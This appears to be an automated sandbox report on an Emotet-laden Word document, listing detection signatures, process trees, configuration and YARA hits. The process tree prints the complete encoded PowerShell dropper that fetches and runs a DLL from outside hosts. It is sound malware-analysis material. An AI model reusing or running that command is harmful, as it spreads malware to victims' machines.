Play interactive tour

Edit tour

Analysis Report MENSAJE.doc

Overview

General Information

Sample Name:	MENSAJE.doc
Analysis ID:	343668
MD5:	cca3520e9a551b59637a6f7cecf4b39f
SHA1:	cbc4f477ab784d5b13f0f1bae27cd89e0b2ac10c
SHA256:	0965ec391a19f82dbbcc65557513a1b5a98d0fbec1c3a7f66aa6e32e667fb5a0
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Document contains an embedded VBA with many string operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Obfuscated command line found

Potential dropper URLs found in powershell memory

Powershell drops PE file

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2416 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2376 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2496 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2308 cmdline: powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2512 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2312 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 620 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2368 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
